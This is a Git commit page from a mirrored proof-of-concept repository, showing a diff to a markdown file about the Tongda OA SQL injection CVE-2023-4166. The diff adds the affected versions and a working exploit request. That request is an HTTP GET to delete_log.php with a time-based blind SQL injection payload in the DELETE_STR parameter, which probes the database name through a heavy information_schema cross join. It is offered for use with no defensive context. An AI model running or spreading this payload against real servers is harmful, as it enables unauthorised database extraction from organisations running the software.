crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-18 04:04:51 +08:00
Code Issues Packages Projects Releases Wiki Activity

Update 通达OA sql注入漏洞 CVE-2023-4166.md

Browse Source
This commit is contained in:
wy876 2023-11-04 22:24:12 +08:00 committed by GitHub
parent ab7f126afc
commit 16d885872f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
通达OA sql注入漏洞 CVE-2023-4166.md
View File

@ -1,6 +1,13 @@
## 通达OA sql注入漏洞 CVE-2023-4166 ## 通达OA sql注入漏洞 CVE-2023-4166
复现版本11.7版
``` poc ## 影响版本
```
通达OA ≤ v11.10v2017
```
## poc
```
GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1 GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 127.0.0.1:8080 Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0